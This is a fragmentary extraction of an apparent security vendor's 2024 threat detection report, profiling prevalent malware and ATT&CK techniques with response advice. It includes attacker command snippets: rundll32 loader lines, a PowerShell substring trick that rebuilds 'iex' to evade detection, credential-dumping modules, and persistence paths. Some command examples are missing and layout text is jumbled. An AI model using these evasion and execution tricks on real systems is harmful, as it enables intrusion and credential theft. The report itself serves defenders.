can ultimately be hard to
Despite our many gaps, Charcoal Stork was far and away our most
distinguish this activity
prevalent threat in 2023, nearly three times more than the next most
from legitimate software
common threat. This emphasizes the importance of continuing to track
installations. A focus on
this cluster.
behavioral detection of
the malware delivered by
Charcoal Stork is a good
defense-in-depth strategy.
2024 Threat Detection Report 65
THREAT
Impacket
Red Canary observed some notable changes
to the Impacket code repository in 2023.
#2 5.6%
OVERALL CUSTOMERS
RANK AFFECTED
Similarly, the default hardcoded service name (BTOBTO) was also replaced
by a random eight-string value.
With open source offensive tools, it’s important to monitor for any
code changes within the associated code repository. This will help guide
your detection strategies as tools evolve over time and aid in alleviating
detection drift.
TAKE
Visit the Impacket threat page for detection opportunities and atomic tests
to validate your coverage for this threat.
ACTION Response actions may vary depending on which component of the Impacket
script the adversary is leveraging. If you detect a malicious instance of
Impacket, seriously consider isolating the endpoint because there’s likely
an active adversary in your environment. It’s important to keep in mind that
Impacket execution on an endpoint is a symptom of malicious activity and not
the source.
Once the endpoint is isolated, you’ll want to locate the source of the activity,
which often comes from an unmonitored endpoint in the intrusions we
have observed. To do this, you can perform the following pseudo-query in
your EDR or SIEM platform. We recommend executing this query because
Impacket leverages SMB (port 445) and MRPC (port 135) network protocols
for remote execution. Impacket has also been seen to send data over the
Windows default dynamic port range (49152-65535).
Once the source of the activity is identified, you can then start to evaluate if
the adversary loaded other tools, if they were able to move laterally from the
device, and if they stole credentials. If the adversary moved laterally, isolate
2024 Threat Detection Report 67
TAKE
any devices they may have accessed. If there is evidence of credential theft,
reset passwords for the impacted accounts. Please note that if the adversary
ACTION
leveraged Kerberos, passwords will need a double reset over the course of
10 hours (based on the default 10-hour ticket Time to Live setting) to reset
and invalidate existing tickets.
Following the initial response steps above, stop any active processes
associated with Impacket, remove any malicious files written to disk,
and remove any changes to the device made by the adversary. Reimaging
impacted devices is not out of the question, since an adversary may have
installed other tools or established persistence. Impacket’s initial access is
commonly associated with an external-facing appliance (VPN, Citrix, VOIP,
VNC, RDP) that gives access to the internal network. Vulnerabilities might
be present in these appliances, which would require patching in order
to remediate.
Segmentation
There are two things an organization can do to decrease the attack surface
for Impacket-based attacks. The first control is endpoint segmentation
via the Windows Firewall. The common ports and protocols that should be
blocked between workstation-to-workstation—and workstations to non-
domain controllers and non-file servers—include:
THREAT
Mimikatz
Mimikatz is a credential-dumping utility commonly
leveraged by adversaries, penetration testers, and red
teams to extract passwords. As an open source project,
Mimikatz continues to be actively developed.
#3 4.9%
OVERALL CUSTOMERS
RANK AFFECTED
accounts that have recently been active on the endpoint. The next two
most commonly-observed modules were sekurlsa::tickets, which
lists all available Kerberos tickets for all recently authenticated users,
and lsadump::sam, which dumps the Security Account Managers (SAM)
database of password hashes.
TAKE Visit the Mimikatz threat page for detection opportunities and atomic
THREAT
Yellow Cockatoo
Yellow Cockatoo is an activity cluster involving a
remote access trojan (RAT) that delivers various
other malware modules.
#4 4.5%
OVERALL CUSTOMERS
RANK AFFECTED
file bearing the victim’s search query as its name (for example: this-is-
my-search-query.exe). Because potential victims are directed to a site
based on a search they initiated, they may be more inclined to engage
with its content.
Visit the Yellow Cockatoo threat page for detection opportunities and
THREAT
SocGholish
SocGholish leverages drive-by-downloads
masquerading as software updates to trick visitors
of compromised websites into executing malware.
#5 4.5%
OVERALL CUSTOMERS
RANK AFFECTED
Do you C what I C?
Despite the shift to direct delivery of the Update.js file, we continued
to observe a low volume of SocGholish infections that still delivered
the JS within a ZIP file. In those cases, the ZIP filenames continued to
follow an obfuscation trend first observed in 2022. In 2022, SocGholish
began experimenting with changes to their ZIP filenames, perhaps in an
attempt to evade detection based on filename patterns. During the middle
of the year, SocGholish began incorporating homoglyphs (“lookalike”
characters) to replace certain characters in filenames. For example,
2024 Threat Detection Report 73
Secondary payloads
Regardless of how it is delivered, upon execution the JavaScript payload
connects back to SocGholish infrastructure, where it shares details about
the infected host and can retrieve additional malware. The majority of
SocGholish infections we’ve detected did not result in a second-stage
payload, sometimes due to existing mitigations or a rapid response to
isolate the host. In most cases, we observed reconnaissance activity
that only identified the infected endpoint and user. In cases where
an additional payload was deployed, Active Directory and domain
enumeration often followed user discovery, suggesting a selective
targeting of victims.
Consistent with the last few years, Red Canary observed a second-
stage payload in about one in 10 SocGholish incidents. While historically
NetSupport had been a very common payload of choice, SocGholish
began showing a preference for other RATs in 2022, and this trend
continued into 2023. We have not observed SocGholish delivering
NetSupport since January 2023. The first half of 2023 aligned with the
latter half of 2022, wherein Blister with an embedded Cobalt Strike
payload appeared most frequently. However, by the middle of the year
we observed a shift to Mythic in place of Cobalt Strike, consistent
with reporting by Fox-IT. Within seconds of the additional payload’s
deployment, we typically observe post-exploitation reconnaissance
behaviors often associated with pre-ransomware activity. SocGholish
intrusions have enabled various ransomware families in the past,
2024 Threat Detection Report 74
TAKE
Visit the SocGholish threat page for detection opportunities and atomic
tests to validate your coverage for this threat.
THREAT
ChromeLoader
ChromeLoader, a browser hijacker, went through
several evolutions in 2023, challenging our assumptions
and allowing us to refine our analysis of this threat.
#6 3.3%
OVERALL CUSTOMERS
RANK AFFECTED
research from other vendors suggests several other payloads have been
observed as well.
Technical details
In 2023, we observed ChromeLoader using several different file types.
Early in the year, we saw Visual Basic Scripts leading to PowerShell.
By mid-year, we were seeing EXE and MSI installers. The initial file,
often a NSIS installer for EXE files or an Advanced Installer-created
MSI, led to increasingly obfuscated NW.js (formerly node-webkit)
applications including compiled JavaScript. The application, installed
in C:\Users\<username>\AppData\Roaming\, established persistence
through a LNK file placed in C:\Users\<username>\AppData\Roaming\
Microsoft\Windows\Start Menu\Programs\Startup” or a registry
key entry in “HKEY _ CURRENT _ USER\Software\Microsoft\Windows\
CurrentVersion\Run\.
For those not familiar, NW.js apps include many boilerplate runtime files,
including a runtime binary named nw.exe, which is often renamed to
match the name of the application. These files are not malicious on their
own. You can think of it like python.exe executing a malicious .py file. The
malicious code is typically stored in one or more script files included in the
package. The most important files for finding the malicious code are the
package.json and the file pointed to by the main: variable in that file. This
file is often named index.html. The HTML has the malicious JavaScript
code to execute. In more recent versions of ChromeLoader, the JavaScript
runs compiled JavaScript via the win.evalNWbin function.
While the NW.js runtime binary is not malicious on its own, the application
names used by ChromeLoader are often unique. The application is often
named with one or more common words and installed as a subfolder of C:\
Users\<username>\AppData\Roaming\. Throughout 2022 and the first
half of 2023, the ChromeLoader NW.js runtime binary matched the name
of the application, however as of September 2023, it began using the
default filename nw.exe. We have included a partial list of full file paths in
the Detection section of ChromeLoader threat page online.
All of this NW.js activity sets the stage for installing a malicious
browser extension that harvests and redirects search traffic, likely to
fuel advertising, and prevents the user from modifying the extensions
installed in their browser. Malicious browser extensions often fall lower on
defenders’ priority lists, as most just serve up adware. However, the ability
to read and redirect user searches and data entered in the browser can
expose sensitive company information or allow for more effective phishing
campaigns against the user. There is also no guarantee that more
malicious code won’t be installed at a later date.
2024 Threat Detection Report 77
TAKE
Visit the ChromeLoader threat page for detection opportunities and
atomic tests to validate your coverage for this threat.
ACTION The best way to stop ChromeLoader is at its source. Charcoal Stork lures
distributing ChromeLoader typically masquerade as a download for a
cracked video game, software, or movie. Educating users on the risks
of downloading illegal content is a first step but not a solution in and of
itself. The volume of Charcoal Stork downloads we see is evidence of the
persuasiveness of their campaigns.
Because the attack lifecycle between initial execution and the creation
of the Chrome extension is automated and can occur quickly, Red
Canary recommends reimaging all systems that are potentially affected
by ChromeLoader.
2024 Threat Detection Report 78
THREAT
Gamarue
Years after a major disruption, Gamarue is still worming
around, often spreading dangerous payloads.
#7 3.1%
OVERALL CUSTOMERS
RANK AFFECTED
USB threats:
Underlooked Security Burdens
With so many threats facing us, USB worms aren’t often the highest
priority for many security teams, but they are still worth your attention.
While we didn’t see follow-on activity in most Gamarue detections, the
fact that we observed Gamarue in so many environments is significant
because it tells us that USB worms are still a pervasive infection vector
2024 Threat Detection Report 79
TAKE
Visit the Gamarue threat page for detection opportunities and atomic tests
to validate your coverage for this threat.
THREAT
Qbot
After a government takedown in August, Qbot affiliates
resumed activity in late 2023 after adopting new malware
and infrastructure.
#8 2.9%
OVERALL CUSTOMERS
RANK AFFECTED
Also known as “Qakbot,” the Qbot banking trojan has been active since at
least 2007. Initially focused on stealing user data and banking credentials,
Qbot’s functionality has expanded to incorporate features such as
reconnaissance, follow-on payload delivery, command and control (C2)
infrastructure, and anti-analysis capabilities. Qbot is typically delivered
via an email-based distribution model.
Over the years, various groups have distributed Qbot. The Proofpoint-
named groups TA570 and TA577 are historically two of the most
active Qbot malware affiliates. TA570 is sometimes referred to as the
“presidents” affiliate, because of the use of U.S. presidents’ names in its
malware configuration, for example, a campaign identifier like obama225.
TA577 is also informally known as the “letters” affiliate based on the use
of campaign IDs including letters such as AA, BB, or TR. While Red Canary
can not validate with high confidence that a specific group is present in
an environment without obtaining a copy of the malware containing the
campaign identifier, we did observe threats with similar naming schemes
to both TA570 and TA577 in our customers’ environments in 2023.
The story of Qbot in 2023 can be told in three acts: early-year activity,
infrastructure takedown by the FBI, and finally, Qbot affiliates pivoting to
deliver alternative malware.
• Early 2023 brought Qbot in the form of malicious OneNote files that
tricked users into executing an embedded malicious HTML Application
(HTA) file. OneNote files were, at the time, not protected by Microsoft’s
Mark-of-the-Web (MOTW) feature. Red Canary and other security
researchers observed OneNote abuse until mid-February.
DarkGate
TA577 was not the only threat to leverage DarkGate this year; Red Canary
observed several different campaigns by different groups using DarkGate
as their primary payload in 2023.
Pikabot
IcedID
Epilogue
TAKE
Visit the Qbot threat page for detection opportunities and atomic tests to
validate your coverage for this threat.
ACTION The best way to remedy the risk of any threat is to prevent your users from
having the opportunity to become a victim. Qbot, DarkGate, and Pikabot
are adaptive threats that are reliant on email for distribution, so if you want
to stop threats like these, start in the inbox. Implementing an email gateway
filtering solution is one way of minimizing infections within your environment.
THREAT
Raspberry Robin
Discovered and named by Red Canary in 2021, Raspberry
Robin is an activity cluster spread by external drives that
leverages Windows Installer to download malicious files.
#9 2.7%
OVERALL CUSTOMERS
RANK AFFECTED
• mixed-case syntax
• a short domain containing only a few characters
• communication over port 8080
• a string of random alphanumeric characters potentially used
as a token
• the victim hostname and/or username
Follow-on payloads
The DLL has a wide variety of functions, including additional C2 activity,
task creation for persistence, and the capability to download and
execute additional payloads. In July 2022, Microsoft reported seeing
SocGholish as a follow-on payload, observing activity resembling
the group they track as Manatee Tempest, which is associated with
2024 Threat Detection Report 86
the cybercriminal group known as Evil Corp. Red Canary also directly
observed Raspberry Robin downloading a malicious SocGholish .js
binary. This development significantly heightened the risk of a Raspberry
Robin infection, making it a potential ransomware precursor based on
historic Manatee Tempest and SocGholish activity. In October 2022,
Microsoft shared additional Raspberry Robin observations, most
notably that they saw Raspberry Robin used in compromises with follow-
on activity including BumbleBee, Cobalt Strike, and IcedID.
TAKE
Visit the Raspberry Robin threat page for detection opportunities and
atomic tests to validate your coverage for this threat.
THREAT
SmashJacker
Often delivered via Charcoal Stork, SmashJacker is
not the most evil browser-hijacker, but it is one of the
most widespread.
#10 2.7%
OVERALL CUSTOMERS
RANK AFFECTED
Browser troubles
During execution, some versions of SmashJacker persist using AppInit
DLLs, while others use Windows scheduled tasks. All of the variants Red
Canary observed distributed a browser extension for Microsoft Edge
and Google Chrome designed to redirect any search queries for common
search engines. When performing queries to Google, Yahoo, and others,
the browser extension rewrote the submitted query URL, directing the
search through an adversary-controlled site such as searchesmia[.]com
designed to monetize the search traffic. During the installation process,
SmashJacker and similar threats have effectively manipulated Google
Chrome’s and Microsoft Edge’s ExtensionInstallAllowList and
ExtensionInstallForceList to install browser extensions with minimal
interaction from a victim.
TAKE
Visit the SmashJacker threat page for detection opportunities and atomic
tests to validate your coverage for this threat.
ACTION The best way to mitigate and respond against threats like SmashJacker
is to embrace practices leading to better IT hygiene. You can prevent
unauthorized installer execution using application allowlisting technologies
such as AppLocker. In addition, Group Policy Objects for Microsoft Edge
and Google Chrome can allow administrators to allowlist browser extensions
by policy, overwriting or disabling new extensions a user attempts to install.
Complete remediation for threats like SmashJacker should include removing
persistence mechanisms, browser extension files, and registry keys that
specifically allow and force the installation of the malicious extension.
2024 Threat Detection Report 89
2024 Threat Detection Report 90
techniques
The purpose of this section is to help you detect malicious activity in its
early stages so you don’t have to deal with the consequences of a serious
security incident.
The following chart represents the most prevalent and impactful MITRE
ATT&CK® techniques observed in confirmed threats across the Red
Canary customer base in 2023. To briefly summarize what’s explained
in detail in the Methodology section, we have a library of nearly 4,000
detection analytics that we use to surface potentially malicious and
suspicious activity across our customers’ environments. These are
mapped to corresponding MITRE ATT&CK techniques whenever possible,
allowing us to associate the behaviors that comprise a confirmed threat
detection with the industry standard for classifying adversary activity.
2022 2023
RANKING RANKING 2023 TOP 10 TECHNIQUES DETECTED
2 1 1 PowerShell (T1059.001)
5 3 8 Rundll32 (T1218.001)
In addition to the top 10, read our analysis of these five featured techniques:
Implementing the guidance in this report will help security teams improve
their defense in depth against the adversary actions that often lead to
a serious incident. Readers will gain a better understanding of common
adversary actions and what’s likely to occur if an adversary gains access
to your environment. You’ll learn what malicious looks like in the form of
telemetry and the many places you can look to find that telemetry. You’ll
gain familiarity with the principles of detection engineering by studying
our detection opportunities. At a bare minimum, you and your team will be
armed with hyper-relevant and easy-to-use Atomic Red Team tests that
you can leverage to ensure that your existing security tooling does what
you think it’s supposed to do. More strategically, this report can help you
identify gaps as you develop a road map for improving coverage, and you
can assess your existing sources of collection against the ones listed in this
report to inform your investments in new tools and personnel.
2024 Threat Detection Report 92
TECHNIQUE
PowerShell (T1059.001)
PowerShell reclaimed its place as the most prevalent
technique we detected in 2023, as adversaries continued
abusing the tool to execute commands, evade defenses,
and more.
#1 22.1% 869
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries use PowerShell?
PowerShell is a versatile and flexible automation and configuration
management framework built on top of the .NET Common Language
Runtime (CLR), which expands its capabilities beyond other common
command-line and scripting languages. PowerShell is included by default
in modern versions of Windows, where it’s widely and routinely used by
system administrators to automate tasks, perform remote management,
and much more. PowerShell’s versatility and ubiquitousness minimize the
need for adversaries to customize payloads or download overtly malicious
tools on a target system.
• execute commands
• evade detection
• obfuscate malicious activity
• spawn additional processes
• remotely download and execute arbitrary code and binaries
• gather information
• change system configurations
2024 Threat Detection Report 93
• GraphRunner
• PowerZure
• MicroBurst
2024 Threat Detection Report 94
TAKE
Visit the PowerShell technique page to explore:
•
ACTION
relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
TECHNIQUE Windows
Command Shell (T1059.003)
Windows Command Shell remains a favorite among
adversaries because it can call on virtually any executable
on the system to execute batch files and arbitrary tasks.
#2 18.9% 837
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries use
Windows Command Shell?
Windows Command Shell is the native command-line interpreter (CLI)
across every version of the Windows operating system. As utilitarian
as it is ubiquitous, Windows Command Shell is one of the primary ways
that adversaries interact with compromised systems. Unlike its more
sophisticated and capable cousin, PowerShell, Windows Command
Shell’s native feature set—i.e., commands that may be invoked without
starting a new process on the system—is limited, having remained
constant for years or even decades. Despite its limitations, an adversary
can abuse Windows Command Shell to call on virtually any executable,
making it an extremely versatile tool.
TAKE
Visit the Windows Command Shell technique page to explore:
•
ACTION
relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
#3 8.1% 819
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries use WMI?
• configure systems
• execute processes or scripts
• automate tasks
• move laterally
• gather information
• modify systems
• achieve persistence
Before delving deeper into how adversaries use WMI, understand that
there are client and server components that make up WMI. The most
recognized clients are the command-line utility wmic.exe (WMIC) and the
PowerShell cmdlet Get-WMIObject. Administrators and adversaries alike
use both for the purposes mentioned above. Because we observe wmic.
exe far more often than Get-WMIObject, the examples provided below
will focus on the former. On the server side, wmiprvse.exe—or the WMI
Provider Host—services many, but not all, requests made by clients. Note
that WMIC is not the only client. There are a number of Windows binaries
that make WMI calls under the hood that are handled by wmiprvse.exe—
tasklist.exe is one example.
We’ve also run into adversaries leveraging XSL Script Processing, which
can be used to bypass application control and—courtesy of WMIC’s /
format option—download code from a remote location. Here’s an example
of what this can look like:
When the above command is run, it will download and execute the
contents of the XSL file.
Adversaries also use WMI for persistence via the trio of WMI event
consumers, filters, and filter-to-consumer bindings. Adversaries
use this persistence mechanism to execute arbitrary code in response
to activity on the endpoint such as a user logging in or out or a file being
written to a specified path.
More than all of this, we observe adversaries abusing WMI through their
use of Impacket’s WMIexec component, which leverages WMI to execute
commands on remote Windows systems, facilitates lateral movement
within a network, and more.
PowerShell has been and remains the ideal solution for working with
WMI, so malware authors might have to shift some of their procedures
over to PowerShell, which would not be particularly impactful to their
operations. Besides, regardless of the process that performs WMI
operations, endpoint security vendors get WMI operation context via
AMSI events. You can read more about that in our blog and one from
our friends at SpecterOps.
TAKE
Visit the Windows Management Instrumentation technique page
to explore:
ACTION •
•
relevant MITRE ATT&CK data sources
log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
TECHNIQUE
Cloud Accounts (T1078.004)
This technique rose from relative obscurity to prominence
in our detection dataset due to an increased focus on the
cloud by adversaries and enterprises alike.
#4 7.7% 701
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries abuse
cloud accounts?
Cloud account compromises are increasing in prevalence as
organizations embrace software-as-a-service (SaaS) for critical
productivity applications like email, file storage, and messaging,
resulting in a substantial volume of data now being stored in the cloud.
This shift is mirrored by adversaries too, who are finding just as much
value in compromising cloud identities as they have historically in
traditional endpoints.
“As organizations The motivations for targeting cloud accounts are diverse, reflecting the
expansive role these accounts play within organizational ecosystems.
migrate their As organizations migrate their operations to the cloud, adversaries see
operations to the an opportunity to exploit the interconnectedness of cloud services.
The stakes are high for defenders because adversaries can exfiltrate
cloud, adversaries
sensitive data from cloud storage systems, block access to business
see an opportunity critical applications, run up the hosting bill by stealing cloud compute
to exploit the for cryptocurrency mining, and abuse enterprise cloud environments in
countless other ways.
interconnectedness
of cloud services.” Cloud accounts can be created on a whim with permissions to grant
access to numerous applications and systems, posing a significant
challenge for defenders. This challenge is magnified in large organizations
with thousands of accounts, necessitating meticulous oversight of roles
and permissions. Maintaining vigilance is not only a time-consuming
endeavor but also costly, underscoring the intricate and expensive nature
of securing cloud environments.
Cloud breaches this past year have shown that initial access techniques
can be surprisingly unsophisticated, requiring minimal infrastructure
setup and cost for adversaries. SMS phishing, also known as “smishing,”
emerged as a notable tactic in multiple publicly reported breaches.
This method involves adversaries using expendable temporary phone
numbers to send text messages, leading to a full escalation chain from
credential theft to data exfiltration. Its simplicity lies in the ease with
which adversaries can grab a temporary phone number and swiftly
deploy text messages to targeted individuals in order for them to enter
credentials on their mobile phone.
TAKE
Visit the Cloud Accounts technique page to explore:
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
However, not all MFA factors offer the same level of security. For instance,
SMS OTPs are susceptible to breaches wherein adversaries gain access
to legitimate credentials and conduct a “SIM swap” to intercept SMS
OTP codes. While SMS-based MFA is considered a better-than-nothing
approach, it remains a potentially vulnerable mechanism.
#5 10.4% 342
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries obfuscate files
and information?
• Base64 encoding
• string concatenation
• substrings
• escape characters
Base64 encoding
String concatenation
Substrings
$ENV:pubLic[13]+$env:PublIc[5]+’x’.
The plus signs here are string concatenation, which we’ve addressed.
Looking on either side of the plus sign, we see a substring that will cause
PowerShell to combine the 14th and sixth characters (note: the first
element of an array starts at 0) from the public environment variable.
On most systems, the public environmental variable will be C:\Users\
Public. You can do the counting, but the resulting substring is ie. The +
operator then adds an x on the end, resulting in the shortened version of
the Invoke-Expression cmdlet, which will execute the code passed to it.
The use of a substring like this offers adversaries a reliable way to subvert
detection analytics that look for PowerShell execution in conjunction with
iex or Invoke-Expression in the command line.
2024 Threat Detection Report 109
ACTION •
•
•
relevant MITRE ATT&CK data sources
log sources to expand your collection
detection opportunities you can tune to your environment
• atomic tests to validate your coverage
#6 6.2% 340
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries leverage email
forwarding rules?
Business email compromise (BEC) and email account compromise (EAC)
attacks remained prevalent in 2023. Adversaries use compromised
credentials or identities to access email accounts, leveraging their
legitimacy to bypass automated security controls and to trick otherwise
phish-aware users who apply more scrutiny to external or unfamiliar email
addresses. Adversaries also use email forwarding rules to hide their
activity from the legitimate user or to exfiltrate data to an external email
address. Forwarding emails to an external account may also allow an
adversary to continue receiving sensitive information after losing access
to the account.
4
Create email rule to automatically
delete certain messages or send them
to a Junk folder
5
Send email to internal finance department
requesting to modify payroll information
or send a wire transfer
6 Collect $$$
2024 Threat Detection Report 113
TAKE
Visit the Email Forwarding Rule technique page to explore:
•
ACTION
relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
Office 365 users can disable external email forwarding rules for their
organization by following this guide by Microsoft. The steps outlined in
this detailed Office 365 hardening guide provided by Mandiant will also
help shrink your attack surface.
2024 Threat Detection Report 114
TECHNIQUE
OS Credential Dumping
(T1114.003)
Adversaries employ OS Credential Dumping to acquire
account credentials that they can subsequently leverage
for lateral movement and unauthorized access to
restricted information.
#7 4.7% 331
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries
dump credentials?
Rooted in the common need for adversaries to infiltrate user accounts
and other resources within target organizations, the OS Credential
Dumping technique encompasses various methods employed by
adversaries and professional penetration testers to acquire valid
usernames and passwords. While there are alternative methods of
access that do not necessitate legitimate user credentials—such as
vulnerability exploitation—possessing a functional username and
password remains one of the most effective and reliable tools for
discreetly gaining access to a system of interest.
How do adversaries
dump credentials?
A Linux utility called unshadow offers a way to streamline the process for
password cracking. It merges information from /etc/passwd and /etc/
shadow into a format tailor-made for password cracking tools like John
the Ripper. Here’s a quick command example to illustrate how it works:
This command efficiently combines the pertinent data into a file named
crack.password.db in the /tmp directory, setting the stage for potential
password-cracking endeavors.
Once a user logs in, the system initiates the creation of credential
materials, neatly storing them in the memory of the LSASS process. These
credentials, accessible to an admin-level user or SYSTEM, are used for
lateral movement.
Note: LSASS Memory didn’t quite make the top 10 this year, but our
analysis from last year’s Threat Detection Report remains as relevant
as ever.
Notably, the NTDS file (NTDS.dit) assumes a central role in this context.
It is typically located within %SystemRoot%\NTDS\Ntds.dit on the
designated domain controller.
The proc filesystem acts as a sort of virtual window into the inner workings
of the Linux kernel, especially when it comes to managing virtual memory.
If an adversary has root privileges, they can delve into these memory
2024 Threat Detection Report 117
TAKE
Visit the OS Credential Dumping technique page to explore:
•
ACTION
relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
2024 Threat Detection Report 118
TECHNIQUE
Rundll32 (T1218.001)
Rundll32 was back in the top 10 in 2023 as an
attractive target for adversaries intent on blending
in due to its necessity, capabilities, frequency of
execution, and legitimacy.
#8 10.3% 326
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries use Rundll32?
Like other prevalent ATT&CK techniques, Rundll32 is a native Windows
process and a functionally necessary component of the Windows
operating system that can’t be blocked or disabled without breaking
things. Adversaries typically abuse Rundll32 because it makes it hard to
differentiate malicious activity from normal operations. More often than
not, we observe adversaries leveraging Rundll32 as a means of credential
theft and execution bypass.
“C:\WINDOWS\system32\rundll32.exe” “C:\ProgramData\45f51194.
dat”,DllRegisterServer
Last but not least, we detect adversaries abusing alternate data streams
to conceal malicious content inside otherwise normal-seeming DLL export
functions. Take the following as an example.
“rundll32.exe” C:\Users\[redacted]:temp.dll,Start
TAKE
Visit the Rundll32 technique page to explore:
ACTION •
•
log sources to expand your collection
detection opportunities you can tune to your environment
• atomic tests to validate your coverage
#9 11.3% 308
OVERALL OF CUSTOMERS THREATS
RANK AFFECTED DETECTED
Analysis
Why do adversaries use Ingress
Tool Transfer?
TAKE
Visit the Ingress Tool Transfer technique page to explore:
•
ACTION
relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
TECHNIQUE
Rename System Utilities
(T1036.003)
A behavior that’s inherently suspicious in the context of
one process can be completely normal in the context
of another, which is precisely why adversaries rename
system utilities to throw defenders off.
Analysis
Why do adversaries rename
system utilities?
Adversaries rename system utilities to circumvent security controls
and bypass detection logic that’s dependent on process names and
process paths. Renaming system utilities allows an adversary to take
advantage of tools that already exist on the target system and prevents
them from having to deploy as many additional payloads after initially
gaining access.
The following are the top 10 most commonly renamed utilities detected by
Red Canary in 2023:
• cmd.exe
• rundll32.exe
• msbuild.exe
• certutil.exe
• vncviewer.exe
• wscript.exe
• 7zip.exe
• adexplorer.exe
• procdump.exe
• psexec.exe
TAKE
Visit the Rename System Utilities technique page to explore:
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
FEATURED
TECHNIQUE Installer Packages
(T1546.016)
Adversaries are packaging their fake installers
with Microsoft’s latest installer format, MSIX.
Analysis
Note: Installer Packages is a broadly scoped sub-technique, and
so we decided to focus our analysis on emerging tradecraft related
to MSIX.
What is MSIX?
MSIX is a packaging format for Windows that eases the packaging,
installation, and update process for applications. It is intended to
improve upon the limitations of the MSI format. MSIX is an evolution of
the APPX format designed originally just for Universal Windows Platform
(UWP) applications (i.e., “modern” apps), which were subject to restrictive
execution constraints. MSIX makes packaging a software installer easy
without imposing execution restraints. As such, it makes for an enticing
format for packaging malicious fake installers.
An MSIX file has the .msix file extension but similar file extensions would
include any of the following: .appx, .appxbundle, .msixbundle, and
.appinstaller. While there are subtle differences between each file type,
an actual .msix file can also be renamed to any of those file extensions
without affecting installation. An MSIX file is a ZIP file consisting of files
related to the installation. The set of files contained within an MSIX file is
called an app package. When properly signed, an MSIX will contain the
following minimum set of files:
1. AppxManifest.xml
2. AppxSignature.p7x
3. AppxBlockMap.xml
This document specifies the files present in the package and their
corresponding hashes. It’s used to validate installation and execution
of the entire package payload, that is, all files in the app package
besides AppxManifest.xml, AppxSignature.p7x, and AppXMetadata\
CodeIntegrity.cat.
Installation footprint
When an MSIX is installed, it is installed as a directory in %ProgramFiles%\
WindowsApps with the following naming scheme:
(Get-AuthenticodeSignature AppxSignature.p7x).SignerCertificate |
Select-Object -Property Thumbprint, Subject
Example output:
Thumbprint : 21A97512A2959B0E74729BE220102AEF1DCF56FD
Subject : CN=IMPERIOUS TECHNOLOGIES LIMITED, O=IMPERIOUS
TECHNOLOGIES LIMITED, L=Ringwood, C=GB
The thumbprint value can then be used to identify other signed samples.
The following VirusTotal Intelligence query would identify all other files
signed by the above signer:
signature:21A97512A2959B0E74729BE220102AEF1DCF56FD
When an MSIX file has any PE files (EXE or DLLs), the app package will
also have the following file: AppxMetadata\CodeIntegrity.cat. This
file is signed with the same certificate as AppxSignature.p7x, and it is
used to validate the integrity of all PE files in the app package. The .cat
file (catalog file) itself consists of the Authenticode hashes of the PE
files. The Authenticode hash of a file can be displayed using Sigcheck
(sigcheck -a) and inspecting the PESHA1 and PE256 hash values.
The AppxSignature.p7x file can help determine the origin of the app. App
packages can be classified into the following groups:
• system apps
• first-party Microsoft Store apps
• third-party Microsoft Store apps
• developer-signed apps
System apps
Developer-signed apps
₀ Microsoft.WinDbg _ 8wekyb3d8bbwe
₀ MSTeams _ 8wekyb3d8bbwe
₀ Microsoft.MicrosoftEdge.Stable _ 8wekyb3d8bbwe
Visit the Installer Packages technique page to see the full output of
Get-AppPackageTriageInfo for a malicious MSIX sample.
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
The installation and execution of apps that do not originate from the
Microsoft Store is referred to as “sideloading.” An administrator can disable
2024 Threat Detection Report 134
ACTION
TAKE
ACTION
WDAC will also log the blocked execution as event ID 3077 in the
ACTION
ACTION
error 0x800B010C: Opening the package
from location Steam-x64.msix failed.
NOTE: For additional information, look for [ActivityId]
4856f352-3f24-0001-fbd6-5948243fda01 in the Event Log or
use the command line Get-AppPackageLog
-ActivityID 4856f352-3f24-0001-fbd6-5948243fda01
At line:1 char:1
+ Add-AppPackage -Path Steam-x64.msix
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (C:\Test\Steam-x64.
msix:String) [Add-AppxPackage], Exception
+ FullyQualifiedErrorId : DeploymentError,Microsoft.Windows.
Appx.PackageManager.Commands.AddAppxPackageCommand
Additional references
FEATURED
TECHNIQUE
Kernel Modules
and Extensions (T1547.006)
Kernel modules and extensions offer adversaries
a reliable means of establishing persistence on
Linux systems.
Analysis
Why do adversaries abuse kernel
modules and extensions?
When an adversary gains access and execution on a system, they are
often hamstrung by the reality that their execution exists in memory
only. Thus, if the machine restarts, the program they had running on the
machine goes away. Kernel modules and extensions allow adversaries
to establish persistence by leveraging autoloading Linux kernel modules
(LKM). LKMs are programs that run within the context of the Linux kernel.
They are essential to allowing a system to function properly. Many LKMs
need to start before the user mode portions like the desktop environment,
web browsers, and more. Therefore, as part of the boot process, many
LKMs are loaded automatically by the system.
Note: Depending on the Linux distribution and the tools installed on it, the
directories that need to be configured may vary slightly. For this analysis,
we will focus on the common techniques that work across many Linux
distributions, but first, some background on loading LKMs.
2024 Threat Detection Report 139
Kernel modules are loaded by one of two syscalls: init _ module and
finit _ module. The init _ module syscall is used to load kernel modules
